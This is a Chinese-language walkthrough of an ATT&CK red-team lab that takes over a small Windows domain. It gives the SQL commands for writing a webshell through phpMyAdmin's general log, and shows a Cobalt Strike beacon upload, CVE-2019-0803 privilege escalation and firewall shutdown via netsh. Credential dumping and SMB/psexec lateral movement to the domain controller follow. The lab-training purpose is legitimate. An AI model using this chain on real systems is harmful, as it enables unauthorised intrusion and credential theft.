ATT&CK实战系列——红队实战(一)

靶机搭建就不说了,之前做过视频

现在环境和密码是改好的

网络配置

ATT&CK实战系列——红队实战(一)_第1张图片

Win7:

Win2008:

Win2K3:

IP
攻击机(物理机) 192.168.55.1
Win7 内:192.168.52.143 / 外:192.168.55.128
Win2008 192.168.52.138
Win2K3 192.168.52.141

外网打点

先查看Web服务器IP:

外网:

ATT&CK实战系列——红队实战(一)_第2张图片

内网:

ATT&CK实战系列——红队实战(一)_第3张图片

开启PHPStudy

访问是个探针,里面包含了站点绝对路径,php版本等信息

扫描目录

ATT&CK实战系列——红队实战(一)_第4张图片

发现了phpinfo、phpmyadmin等信息

弱口令root/root进入后台

ATT&CK实战系列——红队实战(一)_第5张图片

这里使用phpmyadmin日志写shell,先查看有没有开启日志

SHOW VARIABLES LIKE "%SECURE%"

ATT&CK实战系列——红队实战(一)_第6张图片

这里开启日志

SET GLOBAL general\_log = 'on'

设置日志路径,绝对路径在探针里有的

SET GLOBAL general\_log\_file = "C://phpStudy/WWW//shell.php"

设置成功后写马

SELECT ""

ATT&CK实战系列——红队实战(一)_第7张图片

蚁剑连接

内网信息搜集

在蚁剑的命令行执行相关命令即可

ATT&CK实战系列——红队实战(一)_第8张图片

两张网卡分别是内外网

查看当前登录的域和登录用户信息

ATT&CK实战系列——红队实战(一)_第9张图片

有三台主机

域为GOD,DNS为god.org

查看域控

ATT&CK实战系列——红队实战(一)_第10张图片

查看域管

ATT&CK实战系列——红队实战(一)_第11张图片

查看域成员

ATT&CK实战系列——红队实战(一)_第12张图片

信息搜集完成,下一步更深层次的上线CS再进行

CS生成一个马,通过蚁剑上传到服务器,然后终端里执行即可

ATT&CK实战系列——红队实战(一)_第13张图片

成功上线

ATT&CK实战系列——红队实战(一)_第14张图片

深层次的信息搜集

查看主机名

shell net users

ATT&CK实战系列——红队实战(一)_第15张图片

查看用户列表

shell net users

ATT&CK实战系列——红队实战(一)_第16张图片

查看域管

shell net localgroup administrators

ATT&CK实战系列——红队实战(一)_第17张图片

接下来对拿下的web服务器提权

查看系统版本

systeminfo

ATT&CK实战系列——红队实战(一)_第18张图片

提权

搜不到对应的提权EXP

尝试经典的CVE-2019-0803吧

上传CVE-2019-0803.exe到服务器,然后执行命令

shell CVE-2019-0803.exe cmd "start ta.exe"

随后上线system权限的机器

ATT&CK实战系列——红队实战(一)_第19张图片

查看任务列表

shell tasklist

ATT&CK实战系列——红队实战(一)_第20张图片

没有防护软件(肯定没有,不然我那个无免杀的CS马早被杀了)

查看防火墙状态

shell netsh firewall show state

ATT&CK实战系列——红队实战(一)_第21张图片

关闭防火墙

shell netsh advfirewall set allprofile state off

ATT&CK实战系列——红队实战(一)_第22张图片

域渗透

查看当前域内列表

net view

ATT&CK实战系列——红队实战(一)_第23张图片

在CS执行成功后,它自己会将这些主机添加进去

ATT&CK实战系列——红队实战(一)_第24张图片

查看域控列表

net dclist

ATT&CK实战系列——红队实战(一)_第25张图片

这里先抓取服务器凭证

ATT&CK实战系列——红队实战(一)_第26张图片

抓取明文密码

ATT&CK实战系列——红队实战(一)_第27张图片

创建SMB监听器

ATT&CK实战系列——红队实战(一)_第28张图片

ATT&CK实战系列——红队实战(一)_第29张图片

ATT&CK实战系列——红队实战(一)_第30张图片

可以看到拿下域控OWA

ATT&CK实战系列——红队实战(一)_第31张图片

然后使用OWA的session去打另一个

ATT&CK实战系列——红队实战(一)_第32张图片

ATT&CK实战系列——红队实战(一)_第33张图片

ATT&CK实战系列——红队实战(一)_第34张图片

拿下

ATT&CK实战系列——红队实战(一)_第35张图片

小知识:

1、提权把systeminfo信息放一些在线查询的网站上搜可利用的提权方式即可,我这个就是搜到的CVE-2019-0803,这个工具执行命令权限很高,运行之前的CS马就会以system权限上线

2、后面那些psexec、smb是什么?psexec是微软的一个工具,可以用它来提权,而这里它的原理就是通过命名管道使用SMB服务在远程主机上执行powershell

你可能感兴趣的:(靶场,网络安全,渗透测试)